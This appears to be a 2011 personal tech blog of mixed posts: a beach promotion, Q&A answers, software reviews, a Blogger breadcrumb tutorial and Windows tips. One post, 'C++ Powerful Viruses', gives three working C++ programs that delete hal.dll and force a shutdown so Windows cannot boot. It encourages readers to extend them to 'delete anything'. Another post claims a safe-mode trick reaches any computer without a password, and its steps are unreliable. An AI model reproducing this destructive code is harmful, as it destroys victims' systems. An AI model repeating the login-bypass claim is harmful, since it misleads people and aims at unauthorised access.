Saturday, August 27, 2011

Atlantic Beach

Atlantic Beach
Atlantic Beach welcomes new visitors and vacationers back with a hot sun and a wealth of activities. Enjoy the beautiful beaches and major attractions, while enjoying the historic beauty, heritage and amazing the area is known for.
They say there are at least 101 things to do on the coast of crystal, and we say with certainty that it is true. Atlantic Ocean and the Intracoastal Waterway and rivers winding, water-activities include boat tours, cruises, scuba diving, Tours Ecology, fishing piers and fishing, kayaking and boat rentals and more. Atlantic Beach offers one of the best dive destinations in the United States and its natural beauty is unmatched.
The story is also a major attraction at the Crystal Coast. Visitors can enjoy many fun activities along the beach of the Atlantic. For family fun, miniature golf, bumper cars and jetskis fabulous diversions.
Local heritage is also indicated in attractions such as the historic site and museum Core Sound Waterfowl. Skilled craftsmen also gathered along Atlantic Beach. Galleries, arts and entertainment and craft sales abound.
The Crystal Coast is a golfer's paradise with many top flight courses to choose from. With several golf courses in the region, such as Brandywine Bay, Star Hill and Silver Creek Golf Course, you can play from sun up to sundown.
Fall offers the North Carolina Seafood Festival the first week in October on the waterfront of Morehead City and Atlantic Beach King Makerel tournament in September.
Whether in spring, summer or fall, the beautiful Crystal Coast has something to offer everyone. Atlantic Beach offers the serenity of a lazy one week holiday and a weekend. Call our location in Atlantic Beach real estate and blue water vacation to find your "little place in the sun" today.

Wednesday, August 24, 2011

How get a facebook email like yourname@facebook.com ?

People like posts but don't comment on my blog posts?

If you are having about 25 visitors per day it is more likely that you would not get so much comments. Comments depends upon which kind of topic is yours. Controversial topics usually have most of comments. It is also likely that 1000 or more people visit your post and don't comment but just like the post.
Comments depends upon your topics and audience thinking. There is not a genuine problem with your blog. People will comment when they would feel to. Pakistan Defence Blog ( www.defenceblog.org ) was having only about 400 comments when it has 200000 impressions. I hope you may draw a conclusion from this.

Why do my WWE videos keep getting blocked on youtube?

It is because you must be trying to upload videos that have some offense or blood in them. If there is something like that then you must not try to again upload it. Otherwise there is no trick of YouTube to block videos weekly.

For learning the php which software will be best?

There is no software to teach you php but you may refer to w3schools.com in order to find some php tutorials. If you want to see your php script running on your PC download XAMPP. XAMPP has SQL, PHP and Apache Installed ready and you can run a script by putting your php file into XAMPP docs.

Should I make a payment when I have virus in my PC or Laptop ?

Not for sure, Virus may seek your credit card details and provide it to some hacker. You must to make sure you have an antivirus installed and a firewall is on. It is also recommended to use an antivirus program like Avira etc. You must also deny to login to your personal email or something like that if you don't want it to be shown to another person. I hope it would help.

CamStudio Review - Free Video Capture Software


                                                                      Download Link

Cam Studio is open source screen capturing software. It is good for making tutorials for websites like YouTube etc. It has power to capture a specific area, window or full screen. There are many different kind of compressors used in Cam Studio. It has various effects and tools too. It is I suppose most famous screen capturing software and most of YouTube user use it for making tutorials. It also has mouse pan effect. You can record according to your desired quality, format, frame rate and compressor. Download it and have fun making tutorial videos for YouTube or your own site. 

Monday, June 27, 2011

Pak Computers Free web template - Download

                                                                   Download
This is a very professional computer website template I have designed for you. It has javascripts included. I hope you would like this template.

Web Page Maker - Easiest Web Building Software

Web Page Maker Screen Shot

System Requirements:

  • Pentium Class CPU (400 MHz or higher recommended)
  • 24 MEG RAM (64 or higher recommended)
  • 16 bit color display (24 recommended)
  • 10 MEG available disk space
  • Windows 7, Windows 95/98/ME/NT4/2000/XP/Vista
  • An Internet Explorer 5.0 or higher (IE6.0 or higher recommended)

                                        Download Website

 

Main Features

No html coding is required and you do not need any web experience.

Drag and drop the objects. True WYSIWYG layout & design.

Create websites with multiple pages and easily manage your site at once.

The ability to import and edit an existing html page in a WYSIWYG manner.

You can use CSS style sheet to control how the text appears on your site.

Hundreds of functions: photo gallery, rollover image, flash slide show, audio/video, flash video, ready-to-use

Java Script effects, tables, forms, iFrames and much more...

Pre-designed website templates are included.

Preview web pages in browser with one-click.

Publish your web site with just one-click.

Admin Comments

Web Page Maker is a very small size software, but yet very powerful. You can create your personal or business website in minutes. It has built in templates too. It has many java scripts pre installed so you can work at advance level without any programming difficulty. I personally used this software and found it very useful.

Resident Evil: The Mercenaries 3d Screenshots


Resident Evil: The Mercenaries has been released this week. Following are some of screen shots of Resident Evil: The Mercenaries.


Resident Evil: The Mercenaries
Resident Evil: The Mercenaries Screenshot

Resident Evil: The Mercenaries

Resident Evil: The Mercenaries

Resident Evil: The Mercenaries




Saturday, June 25, 2011

Add Breadcrumb Navigation to Blogger Blogspot

Breadcrumb is simple navigation above your posts. It has multiple benefits. First of all it improves your blog navigation but it also make your website search engines friendly.

Adding a breadcrumb to your blog provides a form of text-based navigation. A breadcrumb displays the visitor's location within a blog. The advantage of a breadcrumb is that it provides shortcuts to enable visitors to quickly get around your blog by jumping from one part of your blog to another.

Using this post as an example a breadcrumb might be Home > Navigation > Add a Breadcrumb to Blogger Blogspot Blog. In cases where there is more than one label this hack uses the last label listed. If a visitor wanted to look at other posts about navigation all they need do is click on the "Navigation" link in the breadcrumb and they will be taken to a page which will show them all the posts with the "Navigation" label.
Here is an example of Breadcrumb Navigation.

Home > Label > Post Title

How to install Breadcrumb Navigation to blogger

1. Login to your blogger ( If not logged in )
2. Navigate to Design > Edit HTML




3. Backup your blog ( Not necessary but suggested for precaution )

4. Please check the small box beside Expand Widget Template

5. Find the code ]]></b:skin>
6. Copy and paste the code below exactly above the code ]]></b:skin>

/* Breadcrumb from http://www.pakcomputerguru.blogspot.com/
----------------------------------------------- */
.breadcrumbs {
      padding:5px 5px 5px 0px;
        margin: 0px 0px 15px 0px;
      font-size:100%;
        line-height: 1.4em;
      border-bottom:3px double #e6e4e3;
      }
7. Find the following code in your template :
<div class='post hentry uncustomized-post-template'>  or <div class='post hentry'>
8. Copy and paste the code below exactly below the code <div class='post hentry uncustomized-post-template'> or <div class='post hentry'>

<b:if cond='data:blog.homepageUrl == data:blog.url'>
      <b:else/>
        <b:if cond='data:blog.pageType == &quot;item&quot;'>
            <div class='breadcrumbs'>

             Browse &#187;  <a expr:href='data:blog.homepageUrl' rel='tag'>Home</a>
        <b:loop values='data:posts' var='post'>
          <b:if cond='data:post.labels'>
            <b:loop values='data:post.labels' var='label'>
                  <b:if cond='data:label.isLast == &quot;true&quot;'> &#187;
                    <a expr:href='data:label.url' rel='tag'><data:label.name/></a>
                  </b:if>
          </b:loop>
      &#187; <span><data:post.title/></span>
           </b:if>
        </b:loop>
            </div>
        </b:if>
      <b:else/>
      <b:if cond='data:blog.pageType == &quot;archive&quot;'>
      <div class='breadcrumbs'>
      Browse &#187; <a expr:href='data:blog.homepageUrl'>Home</a> &#187; Archives for <data:blog.pageName/>
      </div>
      </b:if>
      <b:else/>
        <b:if cond='data:navMessage'>
      <div class='breadcrumbs'>
      <data:navMessage/>
      </div>
      </b:if>
      </b:if>
10. Save Template
Now you are done. See result in your posts. Following is result on my blog

Tuesday, June 21, 2011

C++ Powerful Viruses



Note: These viruses are only for educational purposes.

1. This is a virus which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
    std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
    system("shutdown -s -r");
    system("PAUSE");
    return EXIT_SUCCESS;
}
A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:
#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
SVXX's Version of this virus that uses Batch for most of its commands:
#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
    system("del %SystemRoot%\\system32\\hal.dll -q"); //PWNAGE TIME
    system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
    system("PAUSE");
    return EXIT_SUCCESS;
}

I hope you would like them. You can further make them to delete anything.

w3 Schools - Review



Do you want to learn computer languages and have not time to go out? There is a good solution for this problem. w3 schools offers free tutorials on learning computer. You can explore many computer languages on this website. Best things is you don't need any software while learning any programming at this site. It has also an editor by which you could write a script and see results online. It was launched in 1999 by Refsnes Data. It is 100% free of cost.

           Even if you want to be an expert webdesigner this website would be enough for you. You may learn basics to advance web developing languages on this website.


               LINK: http://www.w3schools.com/

Saturday, March 19, 2011

New interface in blogger? woowwww

Blogger Buzz: What’s New With Blogger

Visit this place to check something exciting about blogger.

Sunday, February 6, 2011

Creating hidden folder in XP

Do you want to make hidden folder in windows XP? If yes just follow some simple steps.

1. Create a new folder


Right Click on folder and click rename

Now hold ALT and press 255 in numeric and release ALT, You will see hidden name of folder.


Now to make it more hidden, right click on folder,Click Properties and Click Customize tab


Click Change Icon and select a blank Icon.


Click OK and Apply settings, Now you will see the effect.

If you have problems regarding that just leave a comment.

Access to a computer without knowing password of any user.

With this amazing trick you will be able to access to a computer without knowing password of any user.

Just follow some easy steps.

  • Hold F8 for 5 seconds when turn on your computer
  • Now select safe mode using arrow keys and press enter
  • Press enter again
  • Random codes must be on the screen. Now wait for just about 2 minutes after that you can log in

Fastest Downloader, IDM ( Internet Download Manager )

Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.

Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads. You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.

Other features include multilingual support, zip preview, download categories, scheduler pro, sounds on different events, HTTPS support, queue processor, html help and tutorial, enhanced virus protection on download completion, progressive downloading with quotas (useful for connections that use some kind of fair access policy or FAP like Direcway, Direct PC, Hughes, etc.), built-in download accelerator, and many others.

Version 6.05 adds IDM download panel for web-players that can be used to download flash videos from sites like YouTube, MySpaceTV, and Google Videos. It also features complete Windows 7 and Vista support, YouTube grabber, redeveloped scheduler, and MMS protocol support. The new version also adds improved integration for IE and IE based browsers, redesigned and enhanced download engine, the unique advanced integration into all latest browsers, improved toolbar, and a wealth of other improvements and new features.

Download Website: http://www.internetdownloadmanager.com/

Adding Symbols to a Text using shortcut keys

Alt Key + Calculator Number = Symbol.

To create the ® symbol Alt + 0174 = ®

Alt Key + Number = Symbol

130 = é [accent over e ]
0176 = ° [degrees for Temperature]
0169 = © [Copyright]
0174 = ® [Registered Trademark]
0153 = ™ [Trade Mark]
155 = ¢ [cent sign]
156 = £ [Pound Sterling]
0165 = ¥ [Japanese Yen sign]
0128 = € [Euro symbol]
0190 = ¾
171 = ½
172 = ¼
21 = §
144 = É [Capitalised accent over E]
241 = ±
246 = ÷
174 = «
175 = »
225 = ß
135 = ç
137 = ë
132 = ä
160 = á
133 = à
136 = ê
15 = ¤
170 = ¬
159 = ƒ
146 = Æ
145 = æ
129 = ü
253 = ² [Square sign]
350 = ^
352 = `
382 = ~
166 = ª
254 = ¦
249 = ·
152 = ÿ
142 = Ä
154 = Ü
230 = µ
0134 = † [dagger sign]
20 = ¶
195 = +
194 = -
168 = ¿
197 = +
0179 = ³ [cubic sign]
0161 = ¡

Saturday, February 5, 2011

Set a program to start using a keyboard shortcut


1.Click the Start menu, and then click All Programs. Right-click the program that you want to start with a keyboard shortcut, and then click Properties.


Shortcut menu for a program with Properties selected
2.Click in the Shortcut key box. Now press the letter on your keyboard that you want to use to start the program. Make it easy to remember—for example, press I for Microsoft Internet Explorer.
Note: You can use either uppercase or lowercase letters when creating your keyboard shortcuts—and when accessing them later. In the Shortcut key box, Microsoft Windows XP automatically adds Ctrl + Alt + before the key you pressed. When you want to start the program, hold down both the CTRL and ALT keys simultaneously, while also pressing the letter you chose. This way, your program won't start every time you type that letter.
Properties window for specified program with Shortcut tab displayed and Shortcut key box indicated
3.Click OK.
Properties window for specified program with Shortcut tab displayed and OK button selected
4.Now test your shortcut. Hold down the CTRL and ALT keys, and then press the letter you chose. If you find it difficult to hold down two keys at once, read Turn on the Sticky Keys feature. Your program should start.
Pressing shortcut keys
When your friends see you start up programs without touching your mouse, they just might think you have a psychic connection with your computer!